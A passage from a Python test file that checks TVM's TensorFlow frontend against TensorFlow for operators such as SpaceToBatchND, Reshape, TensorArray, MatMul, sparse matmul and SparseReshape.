padding_np = np.array([0, 1]).astype(np.int32).reshape((1, 2))
with tf.Graph().as_default():
in_data = tf.placeholder(shape=input_shape, dtype=dtype)
const1 = tf.constant(padding_np, dtype=tf.int32)
# make paddings an input to tf.transpose, but not an input to the graph,
# so it can be extracted with infer_value_simulated
paddings = tf.reverse(const1, axis=[-1])
out = tf.space_to_batch_nd(in_data, block_shape, paddings)
compare_tf_with_tvm(data, in_data.name, out.name)
def test_forward_space_to_batch_nd():
# test cases: https://www.tensorflow.org/api_docs/cc/class/tensorflow/ops/space-to-batch-n-d
_test_space_to_batch_nd(input_shape=[1, 2, 2, 1], block_shape=[2, 2], paddings=[[0, 0], [0, 0]])
_test_space_to_batch_nd(input_shape=[1, 2, 2, 3], block_shape=[2, 2], paddings=[[0, 0], [0, 0]])
_test_space_to_batch_nd(input_shape=[1, 4, 4, 1], block_shape=[2, 2], paddings=[[0, 0], [0, 0]])
_test_space_to_batch_nd(
input_shape=[2, 2, 4, 1], block_shape=[2, 2], paddings=[[0, 0], [2, 0]], dtype="int64"
)
# pylint: disable=line-too-long
# https://github.com/tensorflow/tensorflow/blob/24f578/tensorflow/python/kernel_tests/spacetobatch_op_test.py
_test_space_to_batch_nd(input_shape=[2, 3], block_shape=[2], paddings=[[1, 0]], dtype="float32")
_test_space_to_batch_nd(
input_shape=[2, 3, 2], block_shape=[2], paddings=[[1, 0]], dtype="float64"
)
_test_space_to_batch_nd_infer_paddings(input_shape=[2, 3, 2], block_shape=[2])
#######################################################################
# BatchToSpaceND
# --------------
def _test_batch_to_space_nd(input_shape, block_shape, crops, dtype="int32"):
data = np.random.uniform(0, 5, size=input_shape).astype(dtype)
with tf.Graph().as_default():
in_data = tf.placeholder(shape=input_shape, dtype=dtype)
out = tf.batch_to_space_nd(in_data, block_shape, crops)
compare_tf_with_tvm(data, in_data.name, out.name)
def test_forward_batch_to_space_nd():
# test cases: https://www.tensorflow.org/api_docs/cc/class/tensorflow/ops/batch-to-space-n-d
_test_batch_to_space_nd(input_shape=[4, 1, 1, 1], block_shape=[2, 2], crops=[[0, 0], [0, 0]])
_test_batch_to_space_nd(input_shape=[4, 1, 1, 3], block_shape=[2, 2], crops=[[0, 0], [0, 0]])
_test_batch_to_space_nd(input_shape=[4, 2, 2, 1], block_shape=[2, 2], crops=[[0, 0], [0, 0]])
_test_batch_to_space_nd(
input_shape=[8, 1, 3, 1], block_shape=[2, 2], crops=[[0, 0], [2, 0]], dtype="int64"
)
# pylint: disable=line-too-long
# https://github.com/tensorflow/tensorflow/blob/24f578/tensorflow/python/kernel_tests/batchtospace_op_test.py
_test_batch_to_space_nd(
input_shape=[18, 2, 1, 2], block_shape=[2, 3], crops=[[1, 1], [0, 0]], dtype="float32"
)
_test_batch_to_space_nd(
input_shape=[20, 5, 8, 7], block_shape=[2, 2], crops=[[1, 1], [1, 1]], dtype="float64"
)
#######################################################################
# Reshape
# -------
def _test_reshape(data, out_shape):
""" One iteration of reshape operation with given data and out shape """
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
array_ops.reshape(in_data, out_shape)
compare_tf_with_tvm(data, "Placeholder:0", "Reshape:0")
def _test_reshape_with_call():
""" relay.expr.Call as shape """
data = np.zeros((6, 4, 2))
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
out_shape = tf.constant([1, 2, 3], dtype="int32")
out_shape = tf.multiply(out_shape, 2)
array_ops.reshape(in_data, out_shape)
compare_tf_with_tvm(data, "Placeholder:0", "Reshape:0")
def _test_reshape_like(data, shape_like):
""" A special case for reshape. """
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
in_shape_like = array_ops.placeholder(shape=shape_like.shape, dtype=data.dtype)
out_shape = array_ops.shape(in_shape_like)
array_ops.reshape(in_data, out_shape)
compare_tf_with_tvm(data, "Placeholder:0", "Reshape:0")
def _test_reshape_symbolic(data, a_data, b_data):
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
a = array_ops.placeholder(shape=a_data.shape, dtype=a_data.dtype)
b = array_ops.placeholder(shape=b_data.shape, dtype=b_data.dtype)
newshape = tf.add(a, b)
out = array_ops.reshape(in_data, newshape)
for mode in ["debug", "vm"]:
compare_tf_with_tvm(
[data, a_data, b_data], [in_data.name, a.name, b.name], out.name, mode=mode
)
def test_forward_reshape():
_test_reshape(np.arange(6.0), [2, 3])
_test_reshape(np.arange(6), [-1, 2])
_test_reshape(np.arange(6), [3, -1])
_test_reshape(np.arange(6), [-1])
_test_reshape_with_call()
_test_reshape_like(np.zeros((3, 6)), np.zeros((9, 2)))
_test_reshape_symbolic(np.arange(6.0), np.array([2, 0]), np.array([0, 3]))
_test_reshape_symbolic(np.arange(6), np.array([-1, 0]), np.array([0, 2]))
_test_reshape_symbolic(np.arange(6), np.array([3, 0]), np.array([3, -1]))
_test_reshape_symbolic(np.arange(6), np.array([0]), np.array([-1]))
#######################################################################
# DepthToSpace
# ------------
def _test_depthtospace(data, block_size):
""" One iteration of depth_to_space operation with given data and block size """
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
array_ops.depth_to_space(in_data, block_size)
compare_tf_with_tvm(data, "Placeholder:0", "DepthToSpace:0")
def test_forward_depthtospace():
_test_depthtospace(np.random.normal(size=[1, 32, 32, 4]), 2)
_test_depthtospace(np.random.normal(size=[1, 16, 8, 32]), 4)
#######################################################################
# SpaceToDepth
# ------------
def _test_spacetodepth(data, block_size):
""" One iteration of space_to_depth operation with given data and block size """
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
array_ops.space_to_depth(in_data, block_size)
compare_tf_with_tvm(data, "Placeholder:0", "SpaceToDepth:0")
def test_forward_spacetodepth():
_test_spacetodepth(np.random.normal(size=[1, 32, 32, 4]), 2)
_test_spacetodepth(np.random.normal(size=[1, 16, 8, 32]), 4)
#######################################################################
# Squeeze
# -------
def _test_squeeze(data, squeeze_dims=None):
""" One iteration of squeeze """
if squeeze_dims is None:
squeeze_dims = []
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
if squeeze_dims:
array_ops.squeeze(in_data, squeeze_dims)
else:
array_ops.squeeze(in_data)
compare_tf_with_tvm(data, "Placeholder:0", "Squeeze:0")
def test_forward_squeeze():
""" Squeeze """
# Nothing to squeeze.
_test_squeeze(np.arange(2).reshape((2)))
_test_squeeze(np.arange(6).reshape((2, 3)))
# Squeeze the middle element away.
_test_squeeze(np.arange(4).reshape((2, 1, 2)))
# Squeeze on both ends.
_test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)))
# Positive squeeze dim index.
_test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)), [0])
_test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)), [2, 4])
_test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)), [0, 4, 2])
# Negative squeeze dim index.
_test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)), [-1])
_test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)), [-3, -5])
_test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)), [-3, -5, -1])
#######################################################################
# TensorArray
# -----------
def test_tensor_array_write_read():
def run(dtype_str, infer_shape, element_shape):
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
np_data = np.array([[1.0, 2.0], [3.0, 4.0]]).astype(dtype_str)
in_data = [np_data, np_data]
t1 = tf.constant(np_data, dtype=dtype)
t2 = tf.constant(np_data, dtype=dtype)
ta1 = tf.TensorArray(
dtype=dtype, size=2, infer_shape=infer_shape, element_shape=element_shape
)
ta2 = ta1.write(0, t1)
ta3 = ta2.write(1, t2)
out = ta3.read(0)
g = tf.get_default_graph()
compare_tf_with_tvm([], [], "TensorArrayReadV3:0", mode="vm")
for dtype in ["float32", "int8"]:
run(dtype, False, None)
run(dtype, False, tf.TensorShape([None, 2]))
run(dtype, True, None)
def test_tensor_array_scatter():
def run(dtype_str, infer_shape):
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
if infer_shape:
element_shape = tf.TensorShape([tf.Dimension(None)])
else:
element_shape = None
t = tf.constant(np.array([[1.0], [2.0], [3.0]]).astype(dtype_str), dtype=dtype)
indices = tf.constant([2, 1, 0])
ta1 = tf.TensorArray(
dtype=dtype, size=3, infer_shape=infer_shape, element_shape=element_shape
)
ta2 = ta1.scatter(indices, t)
out0 = ta2.read(0)
out1 = ta2.read(1)
out2 = ta2.read(2)
g = tf.get_default_graph()
compare_tf_with_tvm([], [], ["TensorArrayReadV3:0"], mode="vm")
compare_tf_with_tvm([], [], ["TensorArrayReadV3_1:0"], mode="vm")
compare_tf_with_tvm([], [], ["TensorArrayReadV3_2:0"], mode="vm")
for dtype in ["float32", "int8"]:
run(dtype, False)
run(dtype, True)
def test_tensor_array_gather():
def run(dtype_str, infer_shape):
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
t = tf.constant(np.array([[1.0], [2.0], [3.0]]).astype(dtype_str))
scatter_indices = tf.constant([2, 1, 0])
gather_indices = tf.constant([1, 2])
ta1 = tf.TensorArray(dtype=dtype, size=3, infer_shape=infer_shape)
ta2 = ta1.scatter(scatter_indices, t)
t1 = ta2.gather(gather_indices)
g = tf.get_default_graph()
compare_tf_with_tvm([], [], ["TensorArrayGatherV3:0"], mode="vm")
for dtype in ["float32", "int8"]:
run(dtype, True)
def test_tensor_array_split():
def run(dtype_str, infer_shape):
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
t = tf.constant(
np.array([[1.0], [2.0], [3.0], [4.0], [5.0], [6.0], [7.0], [8.0]]).astype(
dtype_str
),
dtype=dtype,
)
split_length = tf.constant([2, 2, 2, 2], dtype=tf.int32)
ta1 = tf.TensorArray(dtype=dtype, size=4, infer_shape=infer_shape)
ta2 = ta1.split(t, split_length)
out0 = ta2.read(0)
out1 = ta2.read(1)
out2 = ta2.read(2)
out3 = ta2.read(3)
g = tf.get_default_graph()
compare_tf_with_tvm([], [], ["TensorArrayReadV3:0"], mode="debug")
compare_tf_with_tvm([], [], ["TensorArrayReadV3_1:0"], mode="debug")
compare_tf_with_tvm([], [], ["TensorArrayReadV3_2:0"], mode="debug")
compare_tf_with_tvm([], [], ["TensorArrayReadV3_3:0"], mode="debug")
for dtype in ["float32", "int8"]:
run(dtype, False)
run(dtype, True)
def test_tensor_array_concat():
def run(dtype_str, infer_shape):
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
t = tf.constant(
np.array([[1.0], [2.0], [3.0], [4.0], [5.0], [6.0], [7.0], [8.0]]).astype(
dtype_str
),
dtype=dtype,
)
split_length = tf.constant([2, 2, 2, 2], dtype=tf.int32)
ta1 = tf.TensorArray(dtype=dtype, size=4, infer_shape=infer_shape)
ta2 = ta1.split(t, split_length)
t = ta2.concat()
out = tf.identity(t)
compare_tf_with_tvm([], [], ["Identity:0"], mode="debug")
for dtype in ["float32", "int8"]:
run(dtype, False)
run(dtype, True)
def test_tensor_array_size():
if package_version.parse(tf.VERSION) >= package_version.parse("1.15.0"):
pytest.skip("Needs fixing for tflite >= 1.15.0")
def run(dtype_str, infer_shape):
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
np_data = np.array([[1.0, 2.0], [3.0, 4.0]]).astype(dtype_str)
in_data = [np_data, np_data]
t1 = tf.constant(np_data, dtype=dtype)
t2 = tf.constant(np_data, dtype=dtype)
ta1 = tf.TensorArray(dtype=dtype, size=2, infer_shape=infer_shape)
ta2 = ta1.write(0, t1)
ta3 = ta2.write(1, t2)
out = ta3.size()
g = tf.get_default_graph()
compare_tf_with_tvm([], [], "TensorArraySizeV3:0", mode="debug")
for dtype in ["float32", "int8"]:
run(dtype, False)
run(dtype, True)
def test_tensor_array_stack():
def run(dtype_str, infer_shape):
if package_version.parse(tf.VERSION) >= package_version.parse("1.15.0"):
pytest.skip("Needs fixing for tflite >= 1.15.0")
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
t = tf.constant(np.array([[1.0], [2.0], [3.0]]).astype(dtype_str))
scatter_indices = tf.constant([2, 1, 0])
ta1 = tf.TensorArray(dtype=dtype, size=3, infer_shape=infer_shape)
ta2 = ta1.scatter(scatter_indices, t)
t1 = ta2.stack()
print(t1)
g = tf.get_default_graph()
compare_tf_with_tvm([], [], ["TensorArrayStack/TensorArrayGatherV3:0"], mode="vm")
for dtype in ["float32", "int8"]:
run(dtype, True)
def test_tensor_array_unstack():
def run(dtype_str, input_shape, infer_shape):
if package_version.parse(tf.VERSION) >= package_version.parse("1.15.0"):
pytest.skip("Needs fixing for tflite >= 1.15.0")
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
t = tf.constant(np.random.choice([0, 1, 2, 3], size=input_shape).astype(dtype.name))
ta1 = tf.TensorArray(dtype=dtype, infer_shape=infer_shape, size=input_shape[0])
ta2 = ta1.unstack(t)
out0 = ta2.size()
out1 = ta2.read(0)
compare_tf_with_tvm([], [], "TensorArraySizeV3:0", mode="debug")
compare_tf_with_tvm([], [], "TensorArrayReadV3:0", mode="debug")
for dtype in ["float32", "int8"]:
run(dtype, (5,), False)
run(dtype, (5, 5), True)
run(dtype, (5, 5, 5), False)
run(dtype, (5, 5, 5, 5), True)
#######################################################################
# ConcatV2
# --------
def _test_concat_v2(shape1, shape2, dim):
""" One iteration of ConcatV2 """
with tf.Graph().as_default():
dtype = "float32"
in1 = tf.placeholder(shape=shape1, dtype=dtype, name="in1")
in2 = tf.placeholder(shape=shape2, dtype=dtype, name="in2")
array_ops.concat_v2([in1, in2], dim)
np_data1 = np.random.uniform(size=shape1).astype(dtype)
np_data2 = np.random.uniform(size=shape2).astype(dtype)
compare_tf_with_tvm([np_data1, np_data2], ["in1:0", "in2:0"], "ConcatV2:0")
def test_forward_concat_v2():
if tf.__version__ < LooseVersion("1.4.1"):
return
_test_concat_v2([2, 3], [2, 3], 0)
_test_concat_v2([10, 3, 5], [2, 3, 5], 0)
_test_concat_v2([2, 3], [2, 3], 1)
_test_concat_v2([5, 8], [5, 4], 1)
_test_concat_v2([2, 8, 5], [2, 8, 6], -1)
#######################################################################
# Sigmoid
# -------
def _test_sigmoid(data):
""" One iteration of sigmoid """
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
sigmoid_out = math_ops.sigmoid(in_data)
compare_tf_with_tvm(data, "Placeholder:0", "Sigmoid:0")
def test_forward_sigmoid():
""" Sigmoid """
_test_sigmoid(np.random.uniform(size=(3, 4, 4, 3)).astype("float32"))
#######################################################################
# Argmin/Argmax
# -------------
def _test_argx(func, data, **kwargs):
with tf.Graph().as_default():
inp = array_ops.placeholder(shape=data.shape, dtype=data.dtype, name="c0")
func(inp, name="argx0", **kwargs)
compare_tf_with_tvm(data, "c0:0", "argx0:0")
def test_forward_argminmax():
for output_type in [tf.int64, tf.int32]:
for axis in [None, 0, 1, 2]:
data = np.random.uniform(size=(8, 4, 9)).astype("float32")
_test_argx(tf.argmax, data=data, axis=axis, output_type=output_type)
_test_argx(tf.argmin, data=data, axis=axis, output_type=output_type)
#######################################################################
# Variable
# --------
def _test_variable(data):
""" One iteration of a variable """
tf.reset_default_graph()
with tf.Graph().as_default():
input_op = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
input_tensor = array_ops.reshape(input_op, data.shape)
size = input_tensor.shape.dims[1]
with variable_scope.variable_scope("linear", reuse=None):
w = variable_scope.get_variable("w", shape=[size, size], dtype=input_tensor.dtype)
math_ops.matmul(input_tensor, w)
compare_tf_with_tvm(data, "Placeholder:0", "MatMul:0", init_global_variables=True)
def test_forward_variable():
"""Variable type op test"""
_test_variable(np.random.uniform(size=(32, 100)).astype("float32"))
@tvm.testing.parametrize_targets("llvm", "cuda")
def test_read_variable_op(target, dev):
""" Read Variable op test """
tf.reset_default_graph()
data = np.random.uniform(size=(32, 100)).astype("float32")
input_tensor = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
size = input_tensor.shape.dims[1]
var_data = np.random.uniform(-5, 5, size=[size, size]).astype(np.float32)
input_var = tf.Variable(var_data, name="var1", use_resource=True)
math_ops.matmul(input_tensor, input_var)
out_name = ["MatMul:0"]
out_node = ["MatMul"]
in_name = ["Placeholder:0"]
in_node = ["Placeholder"]
in_data = [data]
with tf.Session() as sess:
sess.run(variables.global_variables_initializer())
final_graph_def = sess.graph.as_graph_def(add_shapes=True)
tf_output = run_tf_graph(sess, in_data, in_name, out_name)
shape_dict = {e: i.shape for e, i in zip(in_name, in_data)}
with pytest.raises(Exception) as execinfo:
mod, params = relay.frontend.from_tensorflow(
final_graph_def, layout=None, shape=shape_dict, outputs=None
)
assert execinfo.value.args[0].startswith("Graph is not frozen. Provide a frozen graph")
# Now convert the variables to constant and run inference on the converted graph
final_graph_def = tf.graph_util.convert_variables_to_constants(
sess,
sess.graph.as_graph_def(add_shapes=True),
out_node,
)
tvm_output = run_tvm_graph(
final_graph_def,
in_data,
in_node,
target=target,
out_names=out_name,
num_output=len(out_name),
)
for i in range(len(tf_output)):
tvm.testing.assert_allclose(tf_output[i], tvm_output[i], atol=1e-4, rtol=1e-5)
sess.close()
#######################################################################
# MatMul, BatchMatMul, BatchMatMulV2
# ----------------------------------
def _test_matmul(i, j, k, dtype, outer=None):
""" One iteration of matmul """
A_shape_init = [i, j]
B_shape_init = [j, k]
for transpose_a in [False, True]:
for transpose_b in [False, True]:
outer = outer or []
A_shape = outer + (A_shape_init[::-1] if transpose_a else A_shape_init)
B_shape = outer + (B_shape_init[::-1] if transpose_b else B_shape_init)
with tf.Graph().as_default():
A = tf.placeholder(shape=A_shape, dtype=dtype, name="A")
B = tf.placeholder(shape=B_shape, dtype=dtype, name="B")
result = tf.matmul(A, B, transpose_a=transpose_a, transpose_b=transpose_b)
A_np = np.random.uniform(high=5.0, size=A_shape).astype(dtype)
B_np = np.random.uniform(high=5.0, size=B_shape).astype(dtype)
compare_tf_with_tvm([A_np, B_np], [A.name, B.name], result.name)
def test_forward_matmul():
""" MatMul op test"""
_test_matmul(1, 3, 6, "int32")
_test_matmul(5, 3, 1, "float64")
def _test_batch_matmul(A_shape, B_shape, dtype, adjoint_a=False, adjoint_b=False):
with tf.Graph().as_default():
A = tf.placeholder(shape=A_shape, dtype=dtype, name="A")
B = tf.placeholder(shape=B_shape, dtype=dtype, name="B")
result = tf.matmul(A, B, adjoint_a=adjoint_a, adjoint_b=adjoint_b, name="batchmatmul")
A_np = np.random.uniform(high=5.0, size=A_shape).astype(dtype)
B_np = np.random.uniform(high=5.0, size=B_shape).astype(dtype)
compare_tf_with_tvm([A_np, B_np], [A.name, B.name], result.name)
def _test_batch_matmul_dynamic(
A_shape, B_shape, A_np_shape, B_np_shape, dtype, adjoint_a=False, adjoint_b=False
):
with tf.Graph().as_default():
A = tf.placeholder(shape=A_shape, dtype=dtype, name="A")
B = tf.placeholder(shape=B_shape, dtype=dtype, name="B")
result = tf.matmul(A, B, adjoint_a=adjoint_a, adjoint_b=adjoint_b, name="batchmatmul")
A_np = np.random.uniform(high=5.0, size=A_np_shape).astype(dtype)
B_np = np.random.uniform(high=5.0, size=B_np_shape).astype(dtype)
# for now, in TOPI, only cublas's implementation support dynamic shape
# TODO add more backends support in TOPI
compare_tf_with_tvm(
[A_np, B_np], [A.name, B.name], result.name, mode="vm", targets=["cuda -libs=cublas"]
)
def test_forward_batch_matmul():
""" TF op BatchMatMul, BatchMatMulV2 test"""
_test_batch_matmul((3, 5, 4), (3, 4, 5), "int32")
_test_batch_matmul((3, 5, 4), (3, 4, 5), "float32", True, True)
_test_batch_matmul((3, 5, 4), (3, 5, 4), "int32", True, False)
_test_batch_matmul((3, 5, 4), (3, 5, 4), "float32", False, True)
_test_batch_matmul((2, 3, 4, 5, 6), (2, 3, 4, 6, 5), "int32")
_test_batch_matmul((1, 2, 3, 4, 5, 6), (1, 2, 3, 4, 6, 5), "float32", True, True)
_test_batch_matmul((3, 4, 5, 6), (3, 4, 5, 6), "int32", True, False)
_test_batch_matmul((2, 3, 4, 2, 3, 4, 5, 6), (2, 3, 4, 2, 3, 4, 5, 6), "float32", False, True)
@tvm.testing.requires_cuda
def test_forward_batch_matmul_dynamic():
_test_batch_matmul_dynamic((None, 5, 4), (None, 4, 5), (3, 5, 4), (3, 4, 5), "int32")
_test_batch_matmul_dynamic(
(None, 5, 4), (None, 4, 5), (3, 5, 4), (3, 4, 5), "float32", True, True
)
_test_batch_matmul_dynamic(
(None, 5, 4), (None, 5, 4), (3, 5, 4), (3, 5, 4), "int32", True, False
)
_test_batch_matmul_dynamic(
(None, 5, 4), (None, 5, 4), (3, 5, 4), (3, 5, 4), "float32", False, True
)
_test_batch_matmul_dynamic(
(None, 4, 5, 6), (None, 4, 6, 5), (3, 4, 5, 6), (3, 4, 6, 5), "float32"
)
_test_batch_matmul_dynamic(
(None, None, 5, 6), (None, None, 6, 5), (3, 4, 5, 6), (3, 4, 6, 5), "float32"
)
_test_batch_matmul_dynamic(
(None, None, None, 5, 6),
(None, None, None, 6, 5),
(2, 3, 4, 5, 6),
(2, 3, 4, 6, 5),
"float32",
)
#######################################################################
# SparseTensorDenseMatMul
# ----------------------------------
def _test_sparse_dense_matmul(indices, values, A_inp_shape, B_inp_shape, dtype, flip=False):
""" One iteration of sparse_dense_matmul """
for adjoint_a in [False, True]:
for adjoint_b in [False, True]:
A_shape = A_inp_shape[::-1] if adjoint_a else A_inp_shape
B_shape = B_inp_shape[::-1] if adjoint_b else B_inp_shape
with tf.Graph().as_default():
A_sp = tf.sparse.SparseTensor(indices=indices, values=values, dense_shape=A_shape)
B = tf.placeholder(shape=B_shape, dtype=dtype, name="B")
if flip:
result = tf.sparse.sparse_dense_matmul(
B, A_sp, adjoint_a=adjoint_b, adjoint_b=adjoint_a
)
else:
result = tf.sparse.sparse_dense_matmul(
A_sp, B, adjoint_a=adjoint_a, adjoint_b=adjoint_b
)
B_np = np.random.uniform(high=5.0, size=B_shape).astype(dtype)
compare_tf_with_tvm([B_np], [B.name], result.name)
def test_forward_sparse_dense_matmul():
""" sparse_dense_matmul op test"""
###################################################################
#
# In order to create a SparseTensor, it requires 3 input as below:
# SparseTensor(indices=[[0, 0], [1, 2]], values=[1, 2], dense_shape=[3, 4])
#
# Above Sparse can be represented in Dense as below :
# [[1, 0, 0, 0]
# [0, 0, 2, 0]
# [0, 0, 0, 0]]
#
# ------------------------------------------------------------------
_test_sparse_dense_matmul([[0, 0], [1, 2]], [4.0, 8.0], [3, 4], [4, 3], "float32")
_test_sparse_dense_matmul([[0, 0], [1, 2]], [4.0, 8.0], [3, 3], [3, 3], "float32")
_test_sparse_dense_matmul([[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [5, 5], [5, 5], "float32")
_test_sparse_dense_matmul([[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [7, 9], [9, 5], "float32")
_test_sparse_dense_matmul([[0, 0], [1, 2]], [4.0, 8.0], [4, 3], [3, 4], "float32", True)
_test_sparse_dense_matmul([[0, 0], [1, 2]], [4.0, 8.0], [3, 3], [3, 3], "float32", True)
_test_sparse_dense_matmul(
[[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [5, 5], [5, 5], "float32", True
)
_test_sparse_dense_matmul(
[[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [9, 5], [7, 9], "float32", True
)
#######################################################################
# SparseFillEmptyRows
# ------------
def _test_sparse_fill_empty_rows(indices_np, values_np, dense_shape_np, default_value_int, use_dyn):
with tf.Graph().as_default():
if use_dyn:
indices = tf.placeholder(shape=(None, None), dtype=indices_np.dtype, name="indices")
values = tf.placeholder(shape=(None), dtype=values_np.dtype, name="values")
dense_shape = tf.placeholder(
shape=(None), dtype=dense_shape_np.dtype, name="dense_shape"
)
else:
indices = tf.placeholder(shape=indices_np.shape, dtype=indices_np.dtype, name="indices")
values = tf.placeholder(shape=values_np.shape, dtype=values_np.dtype, name="values")
dense_shape = tf.placeholder(
shape=dense_shape_np.shape, dtype=dense_shape_np.dtype, name="dense_shape"
)
default_value = tf.placeholder(shape=(), dtype=values_np.dtype, name="default_value")
sp_input = tf.sparse.SparseTensor(indices=indices, values=values, dense_shape=dense_shape)
_ = tf.sparse.fill_empty_rows(sp_input, default_value, name="sparse_fill_empty_rows")
compare_tf_with_tvm(
[indices_np, values_np, dense_shape_np, default_value_int],
[indices.name, values.name, dense_shape.name, default_value.name],
[
"sparse_fill_empty_rows/SparseFillEmptyRows:0",
"sparse_fill_empty_rows/SparseFillEmptyRows:1",
"sparse_fill_empty_rows/SparseFillEmptyRows:2",
],
mode="vm",
)
@pytest.mark.parametrize(
"sparse_indices_np, sparse_values_np, dense_shape_np, default_value_int",
[
(
np.array([[1, 1], [0, 3], [0, 1], [2, 0], [3, 1]], dtype=np.int64),
np.array([1, 2, 3, 4, 5], dtype=np.int64),
np.array([5, 6], dtype=np.int64),
10,
),
(
np.array([[1, 1], [0, 3], [2, 0], [3, 1]], dtype=np.int64),
np.array([1, 2, 3, 4], dtype=np.int64),
np.array([5, 6], dtype=np.int64),
10,
),
(
np.array([[0, 1], [0, 3], [2, 0], [3, 1]], dtype=np.int64),
np.array([1, 2, 3, 4], dtype=np.int64),
np.array([5, 6], dtype=np.int64),
10,
),
(
np.array([[1, 1, 1], [1, 3, 1], [2, 0, 5], [3, 1, 6]], dtype=np.int64),
np.array([1, 2, 3, 4], dtype=np.int64),
np.array([7, 7, 7], dtype=np.int64),
5,
),
(
np.array([[1], [2]], dtype=np.int64),
np.array([7, 8], dtype=np.int64),
np.array([5], dtype=np.int64),
4,
),
(
np.ones((0, 1), dtype=np.int64),
np.array([], dtype=np.int64),
np.array([5], dtype=np.int64),
4,
),
(
np.ones((0, 3), dtype=np.int64),
np.array([], dtype=np.int64),
np.array([9, 3, 7], dtype=np.int64),
100,
),
],
)
@pytest.mark.parametrize("use_dyn", [True, False])
def test_forward_sparse_fill_empty_rows(
sparse_indices_np, sparse_values_np, dense_shape_np, default_value_int, use_dyn
):
""" sparse_fill_empty_rows op test"""
###################################################################
#
# In order to create a SparseTensor, it requires 3 input as below:
# SparseTensor(indices=[[0, 0], [1, 2]], values=[1, 2], dense_shape=[3, 4])
#
# Above Sparse can be represented in Dense as below :
# [[1, 0, 0, 0]
# [0, 0, 2, 0]
# [0, 0, 0, 0]]
#
# ------------------------------------------------------------------
_test_sparse_fill_empty_rows(
sparse_indices_np, sparse_values_np, dense_shape_np, default_value_int, use_dyn
)
#######################################################################
# SparseReshape
# ------------
def _test_sparse_reshape(indices_np, values_np, prev_shape_np, new_shape_np, use_dyn=False):
with tf.Graph().as_default():
if use_dyn:
indices = tf.placeholder(shape=(None, None), dtype=indices_np.dtype, name="indices")
values = tf.placeholder(shape=(None), dtype=values_np.dtype, name="values")
prev_shape = tf.placeholder(shape=(None), dtype=prev_shape_np.dtype, name="prev_shape")
new_shape = tf.placeholder(shape=(None), dtype=new_shape_np.dtype, name="new_shape")
else:
indices = tf.placeholder(shape=indices_np.shape, dtype=indices_np.dtype, name="indices")
values = tf.placeholder(shape=values_np.shape, dtype=values_np.dtype, name="values")
prev_shape = tf.placeholder(
shape=prev_shape_np.shape, dtype=prev_shape_np.dtype, name="prev_shape"
)
new_shape = tf.placeholder(
shape=new_shape_np.shape, dtype=new_shape_np.dtype, name="new_shape"
)
sp_input = tf.sparse.SparseTensor(indices=indices, values=values, dense_shape=prev_shape)
_ = tf.sparse.reshape(sp_input, new_shape, name="sparse_reshape")
compare_tf_with_tvm(
[indices_np, values_np, prev_shape_np, new_shape_np],
[indices.name, values.name, prev_shape.name, new_shape.name],
["sparse_reshape:0", "sparse_reshape:1", "sparse_reshape/Identity:0"],
mode="vm",
)
@pytest.mark.parametrize(
"sparse_indices_np, sparse_values_np, prev_shape_np, new_shape_np",
[
(
np.ones((0, 1), dtype=np.int64),
np.array([], dtype=np.int64),
np.array([4], dtype=np.int64),
np.array([2, -1], dtype=np.int64),
),
(
np.ones((0, 1), dtype=np.int64),
np.array([], dtype=np.int64),
np.array([4], dtype=np.int64),
np.array([2, 2], dtype=np.int64),
),
(
np.ones((0, 2), dtype=np.int64),
np.array([], dtype=np.int64),
np.array([3, 6], dtype=np.int64),
np.array([-1, 2], dtype=np.int64),
),
(
np.array([[0, 0, 0], [0, 0, 1], [0, 1, 0], [1, 0, 0], [1, 2, 3]], dtype=np.int64),
np.array([7, 5, 6, 3, 9], dtype=np.int64),
np.array([2, 3, 6], dtype=np.int64),
np.array([-1, 9], dtype=np.int64),
),
(
np.array(
[
[0, 0, 0, 0, 0],
[0, 0, 1, 2, 3],
[0, 1, 0, 3, 5],
[1, 0, 0, 4, 6],
[1, 2, 3, 6, 8],
],
dtype=np.int64,
),
np.array([7, 5, 6, 3, 9], dtype=np.int64),
np.array([2, 3, 6, 7, 9], dtype=np.int64),
np.array([9, -1, 7], dtype=np.int64),
),
(
np.array([[0, 0], [0, 1], [3, 4], [4, 3], [7, 3]], dtype=np.int64),
np.array([7, 5, 6, 3, 9], dtype=np.int64),
np.array([9, 4], dtype=np.int64),
np.array([-1], dtype=np.int64),
),
(
np.array([[0], [5], [10], [20], [24]], dtype=np.int64),
np.array([7, 5, 6, 3, 9], dtype=np.int64),
np.array([25], dtype=np.int64),
np.array([5, 5], dtype=np.int64),
),
(
np.array([[0, 100], [200, 100], [300, 400], [50, 20], [400, 50]], dtype=np.int64),
np.array([7, 5, 6, 3, 9], dtype=np.int64),
np.array([500, 20], dtype=np.int64),
np.array([500, 20], dtype=np.int64),
),
(
